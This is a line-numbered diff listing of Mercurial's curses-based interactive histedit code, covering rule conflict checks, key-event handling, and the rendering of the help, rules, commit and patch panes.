1156 def desc(self):
1158 summary = (
1157 summary = (
1159 cmdutil.rendertemplate(
1158 cmdutil.rendertemplate(
1160 self.ctx, self.ui.config(b'histedit', b'summary-template')
1159 self.ctx, self.ui.config(b'histedit', b'summary-template')
1161 )
1160 )
1162 or b''
1161 or b''
1163 )
1162 )
1164 if summary:
1163 if summary:
1165 return summary
1164 return summary
1166 # This is split off from the prefix property so that we can
1165 # This is split off from the prefix property so that we can
1167 # separately make the description for 'roll' red (since it
1166 # separately make the description for 'roll' red (since it
1168 # will get discarded).
1167 # will get discarded).
1169 return self.ctx.description().splitlines()[0].strip()
1168 return self.ctx.description().splitlines()[0].strip()
1170
1169
1171 def checkconflicts(self, other):
1170 def checkconflicts(self, other):
1172 if other.pos > self.pos and other.origpos <= self.origpos:
1171 if other.pos > self.pos and other.origpos <= self.origpos:
1173 if set(other.ctx.files()) & set(self.ctx.files()) != set():
1172 if set(other.ctx.files()) & set(self.ctx.files()) != set():
1174 self.conflicts.append(other)
1173 self.conflicts.append(other)
1175 return self.conflicts
1174 return self.conflicts
1176
1175
1177 if other in self.conflicts:
1176 if other in self.conflicts:
1178 self.conflicts.remove(other)
1177 self.conflicts.remove(other)
1179 return self.conflicts
1178 return self.conflicts
1180
1179
1181
1180
1182 # ============ EVENTS ===============
1181 # ============ EVENTS ===============
1183 def movecursor(state, oldpos, newpos):
1182 def movecursor(state, oldpos, newpos):
1184 '''Change the rule/changeset that the cursor is pointing to, regardless of
1183 '''Change the rule/changeset that the cursor is pointing to, regardless of
1185 current mode (you can switch between patches from the view patch window).'''
1184 current mode (you can switch between patches from the view patch window).'''
1186 state[b'pos'] = newpos
1185 state[b'pos'] = newpos
1187
1186
1188 mode, _ = state[b'mode']
1187 mode, _ = state[b'mode']
1189 if mode == MODE_RULES:
1188 if mode == MODE_RULES:
1190 # Scroll through the list by updating the view for MODE_RULES, so that
1189 # Scroll through the list by updating the view for MODE_RULES, so that
1191 # even if we are not currently viewing the rules, switching back will
1190 # even if we are not currently viewing the rules, switching back will
1192 # result in the cursor's rule being visible.
1191 # result in the cursor's rule being visible.
1193 modestate = state[b'modes'][MODE_RULES]
1192 modestate = state[b'modes'][MODE_RULES]
1194 if newpos < modestate[b'line_offset']:
1193 if newpos < modestate[b'line_offset']:
1195 modestate[b'line_offset'] = newpos
1194 modestate[b'line_offset'] = newpos
1196 elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:
1195 elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:
1197 modestate[b'line_offset'] = newpos - state[b'page_height'] + 1
1196 modestate[b'line_offset'] = newpos - state[b'page_height'] + 1
1198
1197
1199 # Reset the patch view region to the top of the new patch.
1198 # Reset the patch view region to the top of the new patch.
1200 state[b'modes'][MODE_PATCH][b'line_offset'] = 0
1199 state[b'modes'][MODE_PATCH][b'line_offset'] = 0
1201
1200
1202
1201
1203 def changemode(state, mode):
1202 def changemode(state, mode):
1204 curmode, _ = state[b'mode']
1203 curmode, _ = state[b'mode']
1205 state[b'mode'] = (mode, curmode)
1204 state[b'mode'] = (mode, curmode)
1206 if mode == MODE_PATCH:
1205 if mode == MODE_PATCH:
1207 state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)
1206 state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)
1208
1207
1209
1208
1210 def makeselection(state, pos):
1209 def makeselection(state, pos):
1211 state[b'selected'] = pos
1210 state[b'selected'] = pos
1212
1211
1213
1212
1214 def swap(state, oldpos, newpos):
1213 def swap(state, oldpos, newpos):
1215 """Swap two positions and calculate necessary conflicts in
1214 """Swap two positions and calculate necessary conflicts in
1216 O(|newpos-oldpos|) time"""
1215 O(|newpos-oldpos|) time"""
1217
1216
1218 rules = state[b'rules']
1217 rules = state[b'rules']
1219 assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)
1218 assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)
1220
1219
1221 rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]
1220 rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]
1222
1221
1223 # TODO: swap should not know about histeditrule's internals
1222 # TODO: swap should not know about histeditrule's internals
1224 rules[newpos].pos = newpos
1223 rules[newpos].pos = newpos
1225 rules[oldpos].pos = oldpos
1224 rules[oldpos].pos = oldpos
1226
1225
1227 start = min(oldpos, newpos)
1226 start = min(oldpos, newpos)
1228 end = max(oldpos, newpos)
1227 end = max(oldpos, newpos)
1229 for r in pycompat.xrange(start, end + 1):
1228 for r in pycompat.xrange(start, end + 1):
1230 rules[newpos].checkconflicts(rules[r])
1229 rules[newpos].checkconflicts(rules[r])
1231 rules[oldpos].checkconflicts(rules[r])
1230 rules[oldpos].checkconflicts(rules[r])
1232
1231
1233 if state[b'selected']:
1232 if state[b'selected']:
1234 makeselection(state, newpos)
1233 makeselection(state, newpos)
1235
1234
1236
1235
1237 def changeaction(state, pos, action):
1236 def changeaction(state, pos, action):
1238 """Change the action state on the given position to the new action"""
1237 """Change the action state on the given position to the new action"""
1239 rules = state[b'rules']
1238 rules = state[b'rules']
1240 assert 0 <= pos < len(rules)
1239 assert 0 <= pos < len(rules)
1241 rules[pos].action = action
1240 rules[pos].action = action
1242
1241
1243
1242
1244 def cycleaction(state, pos, next=False):
1243 def cycleaction(state, pos, next=False):
1245 """Changes the action state the next or the previous action from
1244 """Changes the action state the next or the previous action from
1246 the action list"""
1245 the action list"""
1247 rules = state[b'rules']
1246 rules = state[b'rules']
1248 assert 0 <= pos < len(rules)
1247 assert 0 <= pos < len(rules)
1249 current = rules[pos].action
1248 current = rules[pos].action
1250
1249
1251 assert current in KEY_LIST
1250 assert current in KEY_LIST
1252
1251
1253 index = KEY_LIST.index(current)
1252 index = KEY_LIST.index(current)
1254 if next:
1253 if next:
1255 index += 1
1254 index += 1
1256 else:
1255 else:
1257 index -= 1
1256 index -= 1
1258 changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])
1257 changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])
1259
1258
1260
1259
1261 def changeview(state, delta, unit):
1260 def changeview(state, delta, unit):
1262 '''Change the region of whatever is being viewed (a patch or the list of
1261 '''Change the region of whatever is being viewed (a patch or the list of
1263 changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.'''
1262 changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.'''
1264 mode, _ = state[b'mode']
1263 mode, _ = state[b'mode']
1265 if mode != MODE_PATCH:
1264 if mode != MODE_PATCH:
1266 return
1265 return
1267 mode_state = state[b'modes'][mode]
1266 mode_state = state[b'modes'][mode]
1268 num_lines = len(mode_state[b'patchcontents'])
1267 num_lines = len(mode_state[b'patchcontents'])
1269 page_height = state[b'page_height']
1268 page_height = state[b'page_height']
1270 unit = page_height if unit == b'page' else 1
1269 unit = page_height if unit == b'page' else 1
1271 num_pages = 1 + (num_lines - 1) // page_height
1270 num_pages = 1 + (num_lines - 1) // page_height
1272 max_offset = (num_pages - 1) * page_height
1271 max_offset = (num_pages - 1) * page_height
1273 newline = mode_state[b'line_offset'] + delta * unit
1272 newline = mode_state[b'line_offset'] + delta * unit
1274 mode_state[b'line_offset'] = max(0, min(max_offset, newline))
1273 mode_state[b'line_offset'] = max(0, min(max_offset, newline))
1275
1274
1276
1275
1277 def event(state, ch):
1276 def event(state, ch):
1278 """Change state based on the current character input
1277 """Change state based on the current character input
1279
1278
1280 This takes the current state and based on the current character input from
1279 This takes the current state and based on the current character input from
1281 the user we change the state.
1280 the user we change the state.
1282 """
1281 """
1283 selected = state[b'selected']
1282 selected = state[b'selected']
1284 oldpos = state[b'pos']
1283 oldpos = state[b'pos']
1285 rules = state[b'rules']
1284 rules = state[b'rules']
1286
1285
1287 if ch in (curses.KEY_RESIZE, b"KEY_RESIZE"):
1286 if ch in (curses.KEY_RESIZE, b"KEY_RESIZE"):
1288 return E_RESIZE
1287 return E_RESIZE
1289
1288
1290 lookup_ch = ch
1289 lookup_ch = ch
1291 if ch is not None and b'0' <= ch <= b'9':
1290 if ch is not None and b'0' <= ch <= b'9':
1292 lookup_ch = b'0'
1291 lookup_ch = b'0'
1293
1292
1294 curmode, prevmode = state[b'mode']
1293 curmode, prevmode = state[b'mode']
1295 action = KEYTABLE[curmode].get(
1294 action = KEYTABLE[curmode].get(
1296 lookup_ch, KEYTABLE[b'global'].get(lookup_ch)
1295 lookup_ch, KEYTABLE[b'global'].get(lookup_ch)
1297 )
1296 )
1298 if action is None:
1297 if action is None:
1299 return
1298 return
1300 if action in (b'down', b'move-down'):
1299 if action in (b'down', b'move-down'):
1301 newpos = min(oldpos + 1, len(rules) - 1)
1300 newpos = min(oldpos + 1, len(rules) - 1)
1302 movecursor(state, oldpos, newpos)
1301 movecursor(state, oldpos, newpos)
1303 if selected is not None or action == b'move-down':
1302 if selected is not None or action == b'move-down':
1304 swap(state, oldpos, newpos)
1303 swap(state, oldpos, newpos)
1305 elif action in (b'up', b'move-up'):
1304 elif action in (b'up', b'move-up'):
1306 newpos = max(0, oldpos - 1)
1305 newpos = max(0, oldpos - 1)
1307 movecursor(state, oldpos, newpos)
1306 movecursor(state, oldpos, newpos)
1308 if selected is not None or action == b'move-up':
1307 if selected is not None or action == b'move-up':
1309 swap(state, oldpos, newpos)
1308 swap(state, oldpos, newpos)
1310 elif action == b'next-action':
1309 elif action == b'next-action':
1311 cycleaction(state, oldpos, next=True)
1310 cycleaction(state, oldpos, next=True)
1312 elif action == b'prev-action':
1311 elif action == b'prev-action':
1313 cycleaction(state, oldpos, next=False)
1312 cycleaction(state, oldpos, next=False)
1314 elif action == b'select':
1313 elif action == b'select':
1315 selected = oldpos if selected is None else None
1314 selected = oldpos if selected is None else None
1316 makeselection(state, selected)
1315 makeselection(state, selected)
1317 elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:
1316 elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:
1318 newrule = next((r for r in rules if r.origpos == int(ch)))
1317 newrule = next((r for r in rules if r.origpos == int(ch)))
1319 movecursor(state, oldpos, newrule.pos)
1318 movecursor(state, oldpos, newrule.pos)
1320 if selected is not None:
1319 if selected is not None:
1321 swap(state, oldpos, newrule.pos)
1320 swap(state, oldpos, newrule.pos)
1322 elif action.startswith(b'action-'):
1321 elif action.startswith(b'action-'):
1323 changeaction(state, oldpos, action[7:])
1322 changeaction(state, oldpos, action[7:])
1324 elif action == b'showpatch':
1323 elif action == b'showpatch':
1325 changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)
1324 changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)
1326 elif action == b'help':
1325 elif action == b'help':
1327 changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)
1326 changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)
1328 elif action == b'quit':
1327 elif action == b'quit':
1329 return E_QUIT
1328 return E_QUIT
1330 elif action == b'histedit':
1329 elif action == b'histedit':
1331 return E_HISTEDIT
1330 return E_HISTEDIT
1332 elif action == b'page-down':
1331 elif action == b'page-down':
1333 return E_PAGEDOWN
1332 return E_PAGEDOWN
1334 elif action == b'page-up':
1333 elif action == b'page-up':
1335 return E_PAGEUP
1334 return E_PAGEUP
1336 elif action == b'line-down':
1335 elif action == b'line-down':
1337 return E_LINEDOWN
1336 return E_LINEDOWN
1338 elif action == b'line-up':
1337 elif action == b'line-up':
1339 return E_LINEUP
1338 return E_LINEUP
1340
1339
1341
1340
1342 def makecommands(rules):
1341 def makecommands(rules):
1343 """Returns a list of commands consumable by histedit --commands based on
1342 """Returns a list of commands consumable by histedit --commands based on
1344 our list of rules"""
1343 our list of rules"""
1345 commands = []
1344 commands = []
1346 for rules in rules:
1345 for rules in rules:
1347 commands.append(b'%s %s\n' % (rules.action, rules.ctx))
1346 commands.append(b'%s %s\n' % (rules.action, rules.ctx))
1348 return commands
1347 return commands
1349
1348
1350
1349
1351 def addln(win, y, x, line, color=None):
1350 def addln(win, y, x, line, color=None):
1352 """Add a line to the given window left padding but 100% filled with
1351 """Add a line to the given window left padding but 100% filled with
1353 whitespace characters, so that the color appears on the whole line"""
1352 whitespace characters, so that the color appears on the whole line"""
1354 maxy, maxx = win.getmaxyx()
1353 maxy, maxx = win.getmaxyx()
1355 length = maxx - 1 - x
1354 length = maxx - 1 - x
1356 line = bytes(line).ljust(length)[:length]
1355 line = bytes(line).ljust(length)[:length]
1357 if y < 0:
1356 if y < 0:
1358 y = maxy + y
1357 y = maxy + y
1359 if x < 0:
1358 if x < 0:
1360 x = maxx + x
1359 x = maxx + x
1361 if color:
1360 if color:
1362 win.addstr(y, x, line, color)
1361 win.addstr(y, x, line, color)
1363 else:
1362 else:
1364 win.addstr(y, x, line)
1363 win.addstr(y, x, line)
1365
1364
1366
1365
1367 def _trunc_head(line, n):
1366 def _trunc_head(line, n):
1368 if len(line) <= n:
1367 if len(line) <= n:
1369 return line
1368 return line
1370 return b'> ' + line[-(n - 2) :]
1369 return b'> ' + line[-(n - 2) :]
1371
1370
1372
1371
1373 def _trunc_tail(line, n):
1372 def _trunc_tail(line, n):
1374 if len(line) <= n:
1373 if len(line) <= n:
1375 return line
1374 return line
1376 return line[: n - 2] + b' >'
1375 return line[: n - 2] + b' >'
1377
1376
1378
1377
1379 def patchcontents(state):
1378 def patchcontents(state):
1380 repo = state[b'repo']
1379 repo = state[b'repo']
1381 rule = state[b'rules'][state[b'pos']]
1380 rule = state[b'rules'][state[b'pos']]
1382 displayer = logcmdutil.changesetdisplayer(
1381 displayer = logcmdutil.changesetdisplayer(
1383 repo.ui, repo, {b"patch": True, b"template": b"status"}, buffered=True
1382 repo.ui, repo, {b"patch": True, b"template": b"status"}, buffered=True
1384 )
1383 )
1385 overrides = {(b'ui', b'verbose'): True}
1384 overrides = {(b'ui', b'verbose'): True}
1386 with repo.ui.configoverride(overrides, source=b'histedit'):
1385 with repo.ui.configoverride(overrides, source=b'histedit'):
1387 displayer.show(rule.ctx)
1386 displayer.show(rule.ctx)
1388 displayer.close()
1387 displayer.close()
1389 return displayer.hunk[rule.ctx.rev()].splitlines()
1388 return displayer.hunk[rule.ctx.rev()].splitlines()
1390
1389
1391
1390
1392 def _chisteditmain(repo, rules, stdscr):
1391 def _chisteditmain(repo, rules, stdscr):
1393 try:
1392 try:
1394 curses.use_default_colors()
1393 curses.use_default_colors()
1395 except curses.error:
1394 except curses.error:
1396 pass
1395 pass
1397
1396
1398 # initialize color pattern
1397 # initialize color pattern
1399 curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)
1398 curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)
1400 curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)
1399 curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)
1401 curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)
1400 curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)
1402 curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)
1401 curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)
1403 curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)
1402 curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)
1404 curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)
1403 curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)
1405 curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)
1404 curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)
1406 curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)
1405 curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)
1407 curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)
1406 curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)
1408 curses.init_pair(
1407 curses.init_pair(
1409 COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA
1408 COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA
1410 )
1409 )
1411 curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)
1410 curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)
1412
1411
1413 # don't display the cursor
1412 # don't display the cursor
1414 try:
1413 try:
1415 curses.curs_set(0)
1414 curses.curs_set(0)
1416 except curses.error:
1415 except curses.error:
1417 pass
1416 pass
1418
1417
1419 def rendercommit(win, state):
1418 def rendercommit(win, state):
1420 """Renders the commit window that shows the log of the current selected
1419 """Renders the commit window that shows the log of the current selected
1421 commit"""
1420 commit"""
1422 pos = state[b'pos']
1421 pos = state[b'pos']
1423 rules = state[b'rules']
1422 rules = state[b'rules']
1424 rule = rules[pos]
1423 rule = rules[pos]
1425
1424
1426 ctx = rule.ctx
1425 ctx = rule.ctx
1427 win.box()
1426 win.box()
1428
1427
1429 maxy, maxx = win.getmaxyx()
1428 maxy, maxx = win.getmaxyx()
1430 length = maxx - 3
1429 length = maxx - 3
1431
1430
1432 line = b"changeset: %d:%s" % (ctx.rev(), ctx.hex()[:12])
1431 line = b"changeset: %d:%s" % (ctx.rev(), ctx.hex()[:12])
1433 win.addstr(1, 1, line[:length])
1432 win.addstr(1, 1, line[:length])
1434
1433
1435 line = b"user: %s" % ctx.user()
1434 line = b"user: %s" % ctx.user()
1436 win.addstr(2, 1, line[:length])
1435 win.addstr(2, 1, line[:length])
1437
1436
1438 bms = repo.nodebookmarks(ctx.node())
1437 bms = repo.nodebookmarks(ctx.node())
1439 line = b"bookmark: %s" % b' '.join(bms)
1438 line = b"bookmark: %s" % b' '.join(bms)
1440 win.addstr(3, 1, line[:length])
1439 win.addstr(3, 1, line[:length])
1441
1440
1442 line = b"summary: %s" % (ctx.description().splitlines()[0])
1441 line = b"summary: %s" % (ctx.description().splitlines()[0])
1443 win.addstr(4, 1, line[:length])
1442 win.addstr(4, 1, line[:length])
1444
1443
1445 line = b"files: "
1444 line = b"files: "
1446 win.addstr(5, 1, line)
1445 win.addstr(5, 1, line)
1447 fnx = 1 + len(line)
1446 fnx = 1 + len(line)
1448 fnmaxx = length - fnx + 1
1447 fnmaxx = length - fnx + 1
1449 y = 5
1448 y = 5
1450 fnmaxn = maxy - (1 + y) - 1
1449 fnmaxn = maxy - (1 + y) - 1
1451 files = ctx.files()
1450 files = ctx.files()
1452 for i, line1 in enumerate(files):
1451 for i, line1 in enumerate(files):
1453 if len(files) > fnmaxn and i == fnmaxn - 1:
1452 if len(files) > fnmaxn and i == fnmaxn - 1:
1454 win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))
1453 win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))
1455 y = y + 1
1454 y = y + 1
1456 break
1455 break
1457 win.addstr(y, fnx, _trunc_head(line1, fnmaxx))
1456 win.addstr(y, fnx, _trunc_head(line1, fnmaxx))
1458 y = y + 1
1457 y = y + 1
1459
1458
1460 conflicts = rule.conflicts
1459 conflicts = rule.conflicts
1461 if len(conflicts) > 0:
1460 if len(conflicts) > 0:
1462 conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))
1461 conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))
1463 conflictstr = b"changed files overlap with %s" % conflictstr
1462 conflictstr = b"changed files overlap with %s" % conflictstr
1464 else:
1463 else:
1465 conflictstr = b'no overlap'
1464 conflictstr = b'no overlap'
1466
1465
1467 win.addstr(y, 1, conflictstr[:length])
1466 win.addstr(y, 1, conflictstr[:length])
1468 win.noutrefresh()
1467 win.noutrefresh()
1469
1468
1470 def helplines(mode):
1469 def helplines(mode):
1471 if mode == MODE_PATCH:
1470 if mode == MODE_PATCH:
1472 help = b"""\
1471 help = b"""\
1473 ?: help, k/up: line up, j/down: line down, v: stop viewing patch
1472 ?: help, k/up: line up, j/down: line down, v: stop viewing patch
1474 pgup: prev page, space/pgdn: next page, c: commit, q: abort
1473 pgup: prev page, space/pgdn: next page, c: commit, q: abort
1475 """
1474 """
1476 else:
1475 else:
1477 help = b"""\
1476 help = b"""\
1478 ?: help, k/up: move up, j/down: move down, space: select, v: view patch
1477 ?: help, k/up: move up, j/down: move down, space: select, v: view patch
1479 d: drop, e: edit, f: fold, m: mess, p: pick, r: roll
1478 d: drop, e: edit, f: fold, m: mess, p: pick, r: roll
1480 pgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort
1479 pgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort
1481 """
1480 """
1482 return help.splitlines()
1481 return help.splitlines()
1483
1482
1484 def renderhelp(win, state):
1483 def renderhelp(win, state):
1485 maxy, maxx = win.getmaxyx()
1484 maxy, maxx = win.getmaxyx()
1486 mode, _ = state[b'mode']
1485 mode, _ = state[b'mode']
1487 for y, line in enumerate(helplines(mode)):
1486 for y, line in enumerate(helplines(mode)):
1488 if y >= maxy:
1487 if y >= maxy:
1489 break
1488 break
1490 addln(win, y, 0, line, curses.color_pair(COLOR_HELP))
1489 addln(win, y, 0, line, curses.color_pair(COLOR_HELP))
1491 win.noutrefresh()
1490 win.noutrefresh()
1492
1491
1493 def renderrules(rulesscr, state):
1492 def renderrules(rulesscr, state):
1494 rules = state[b'rules']
1493 rules = state[b'rules']
1495 pos = state[b'pos']
1494 pos = state[b'pos']
1496 selected = state[b'selected']
1495 selected = state[b'selected']
1497 start = state[b'modes'][MODE_RULES][b'line_offset']
1496 start = state[b'modes'][MODE_RULES][b'line_offset']
1498
1497
1499 conflicts = [r.ctx for r in rules if r.conflicts]
1498 conflicts = [r.ctx for r in rules if r.conflicts]
1500 if len(conflicts) > 0:
1499 if len(conflicts) > 0:
1501 line = b"potential conflict in %s" % b','.join(
1500 line = b"potential conflict in %s" % b','.join(
1502 map(pycompat.bytestr, conflicts)
1501 map(pycompat.bytestr, conflicts)
1503 )
1502 )
1504 addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))
1503 addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))
1505
1504
1506 for y, rule in enumerate(rules[start:]):
1505 for y, rule in enumerate(rules[start:]):
1507 if y >= state[b'page_height']:
1506 if y >= state[b'page_height']:
1508 break
1507 break
1509 if len(rule.conflicts) > 0:
1508 if len(rule.conflicts) > 0:
1510 rulesscr.addstr(y, 0, b" ", curses.color_pair(COLOR_WARN))
1509 rulesscr.addstr(y, 0, b" ", curses.color_pair(COLOR_WARN))
1511 else:
1510 else:
1512 rulesscr.addstr(y, 0, b" ", curses.COLOR_BLACK)
1511 rulesscr.addstr(y, 0, b" ", curses.COLOR_BLACK)
1513
1512
1514 if y + start == selected:
1513 if y + start == selected:
1515 rollcolor = COLOR_ROLL_SELECTED
1514 rollcolor = COLOR_ROLL_SELECTED
1516 addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))
1515 addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))
1517 elif y + start == pos:
1516 elif y + start == pos:
1518 rollcolor = COLOR_ROLL_CURRENT
1517 rollcolor = COLOR_ROLL_CURRENT
1519 addln(
1518 addln(
1520 rulesscr,
1519 rulesscr,
1521 y,
1520 y,
1522 2,
1521 2,
1523 rule,
1522 rule,
1524 curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,
1523 curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,
1525 )
1524 )
1526 else:
1525 else:
1527 rollcolor = COLOR_ROLL
1526 rollcolor = COLOR_ROLL
1528 addln(rulesscr, y, 2, rule)
1527 addln(rulesscr, y, 2, rule)
1529
1528
1530 if rule.action == b'roll':
1529 if rule.action == b'roll':
1531 rulesscr.addstr(
1530 rulesscr.addstr(
1532 y,
1531 y,
1533 2 + len(rule.prefix),
1532 2 + len(rule.prefix),
1534 rule.desc,
1533 rule.desc,
1535 curses.color_pair(rollcolor),
1534 curses.color_pair(rollcolor),
1536 )
1535 )
1537
1536
1538 rulesscr.noutrefresh()
1537 rulesscr.noutrefresh()
1539
1538
1540 def renderstring(win, state, output, diffcolors=False):
1539 def renderstring(win, state, output, diffcolors=False):
1541 maxy, maxx = win.getmaxyx()
1540 maxy, maxx = win.getmaxyx()
1542 length = min(maxy - 1, len(output))
1541 length = min(maxy - 1, len(output))
1543 for y in range(0, length):
1542 for y in range(0, length):
1544 line = output[y]
1543 line = output[y]
1545 if diffcolors:
1544 if diffcolors:
1546 if line and line[0] == b'+':
1545 if line and line[0] == b'+':
1547 win.addstr(
1546 win.addstr(
1548 y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)
1547 y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)
1549 )
1548 )
1550 elif line and line[0] == b'-':
1549 elif line and line[0] == b'-':
1551 win.addstr(
1550 win.addstr(
1552 y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)
1551 y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)
1553 )
1552 )
1554 elif line.startswith(b'@@ '):
1553 elif line.startswith(b'@@ '):
1555 win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))
1554 win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))
1556 else:
1555 else:
1557 win.addstr(y, 0, line)
1556 win.addstr(y, 0, line)
1558 else:
1557 else:
1559 win.addstr(y, 0, line)
1558 win.addstr(y, 0, line)
1560 win.noutrefresh()
1559 win.noutrefresh()
1561
1560
1562 def renderpatch(win, state):
1561 def renderpatch(win, state):
1563 start = state[b'modes'][MODE_PATCH][b'line_offset']
1562 start = state[b'modes'][MODE_PATCH][b'line_offset']
1564 content = state[b'modes'][MODE_PATCH][b'patchcontents']
1563 content = state[b'modes'][MODE_PATCH][b'patchcontents']
1565 renderstring(win, state, content[start:], diffcolors=True)
1564 renderstring(win, state, content[start:], diffcolors=True)
1566
1565
1567 def layout(mode):
1566 def layout(mode):
1568 maxy, maxx = stdscr.getmaxyx()
1567 maxy, maxx = stdscr.getmaxyx()
1569 helplen = len(helplines(mode))
1568 helplen = len(helplines(mode))
1570 return {
1569 return {
1571 b'commit': (12, maxx),
1570 b'commit': (12, maxx),
1572 b'help': (helplen, maxx),
1571 b'help': (helplen, maxx),
1573 b'main': (maxy - helplen - 12, maxx),
1572 b'main': (maxy - helplen - 12, maxx),
1574 }
1573 }
1575
1574
1576 def drawvertwin(size, y, x):
1575 def drawvertwin(size, y, x):
1577 win = curses.newwin(size[0], size[1], y, x)
1576 win = curses.newwin(size[0], size[1], y, x)
1578 y += size[0]
1577 y += size[0]
1579 return win, y, x
1578 return win, y, x
1580
1579
1581 state = {
1580 state = {
1582 b'pos': 0,
1581 b'pos': 0,
1583 b'rules': rules,
1582 b'rules': rules,
1584 b'selected': None,
1583 b'selected': None,
1585 b'mode': (MODE_INIT, MODE_INIT),
1584 b'mode': (MODE_INIT, MODE_INIT),
1586 b'page_height': None,
1585 b'page_height': None,
1587 b'modes': {
1586 b'modes': {
1588 MODE_RULES: {b'line_offset': 0,},
1587 MODE_RULES: {b'line_offset': 0,},
1589 MODE_PATCH: {b'line_offset': 0,},
1588 MODE_PATCH: {b'line_offset': 0,},
1590 },
1589 },
1591 b'repo': repo,
1590 b'repo': repo,
1592 }
1591 }
1593
1592
1594 # eventloop
1593 # eventloop
1595 ch = None
1594 ch = None
1596 stdscr.clear()
1595 stdscr.clear()
1597 stdscr.refresh()
1596 stdscr.refresh()
1598 while True:
1597 while True:
1599 try:
1598 try:
1600 oldmode, _ = state[b'mode']
1599 oldmode, _ = state[b'mode']
1601 if oldmode == MODE_INIT:
1600 if oldmode == MODE_INIT:
1602 changemode(state, MODE_RULES)
1601 changemode(state, MODE_RULES)
1603 e = event(state, ch)
1602 e = event(state, ch)
1604
1603
1605 if e == E_QUIT:
1604 if e == E_QUIT:
1606 return False
1605 return False
1607 if e == E_HISTEDIT:
1606 if e == E_HISTEDIT:
1608 return state[b'rules']
1607 return state[b'rules']
1609 else:
1608 else:
1610 if e == E_RESIZE:
1609 if e == E_RESIZE:
1611 size = screen_size()
1610 size = screen_size()
1612 if size != stdscr.getmaxyx():
1611 if size != stdscr.getmaxyx():
1613 curses.resizeterm(*size)
1612 curses.resizeterm(*size)
1614
1613
1615 curmode, _ = state[b'mode']
1614 curmode, _ = state[b'mode']
1616 sizes = layout(curmode)
1615 sizes = layout(curmode)
1617 if curmode != oldmode:
1616 if curmode != oldmode:
1618 state[b'page_height'] = sizes[b'main'][0]
1617 state[b'page_height'] = sizes[b'main'][0]
1619 # Adjust the view to fit the current screen size.
1618 # Adjust the view to fit the current screen size.
1620 movecursor(state, state[b'pos'], state[b'pos'])
1619 movecursor(state, state[b'pos'], state[b'pos'])
1621
1620
1622 # Pack the windows against the top, each pane spread across the
1621 # Pack the windows against the top, each pane spread across the
1623 # full width of the screen.
1622 # full width of the screen.
1624 y, x = (0, 0)
1623 y, x = (0, 0)
1625 helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
1624 helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
1626 mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
1625 mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
1627 commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
1626 commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
1628
1627
